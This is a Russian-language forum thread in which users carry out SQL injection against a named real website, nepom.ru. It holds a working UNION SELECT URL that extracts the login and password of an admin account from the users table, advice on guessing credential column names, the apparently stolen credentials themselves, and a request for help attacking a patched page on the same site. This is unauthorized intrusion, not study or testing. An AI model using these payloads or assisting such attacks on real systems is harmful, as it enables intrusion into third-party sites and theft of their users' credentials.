Продолжение следует
http://nepom.ru/story/text.php?id=-1'+UNION+SELECT+1,2,3,login,passwd,6,7,8,9,10,11 FROM+users+where+login='ChatAdmin'/*

virgoz -- благодарю только вот у меня вопрос как ты догадался что там есть login,passwd ............ Крутая иньекция получилась

login, passwd, uname, username, user, pass, password, pas - самые распостраненные имена для столбцов c паролями и логинами.

Вот на досуге полазал нашол следующее
Administrator
ytnvtyz
Вообщем не без вашей помощи удалось добыть далее захожу и нахожу бд my sql... Вот только почемута не получается войти пароль может иной или доступ только по IP можете взглянуть может у вас чтонибуть выйдет........

Та же беда
Не пускает.

Ну жаль скорее всего идёт проверка по Ip потому и не пускает мне в принципе прав админа хватает...

Здраствуйте снова был такой ресурс nepom.ru потом временно его не стало но сейчас он появился снова но пропатчиный но со старой дыркой http://nepom.ru/interest/?raz='
Иньекцию не получается сделать никак, нет таких мозгов как virgoz[B] Помогите...

http://nepom.ru/interest/?raz='
Запрос SELECT `id` FROM `int` WHERE `raz`=''' не выполнен

выбор идет только по одному INTEGER полю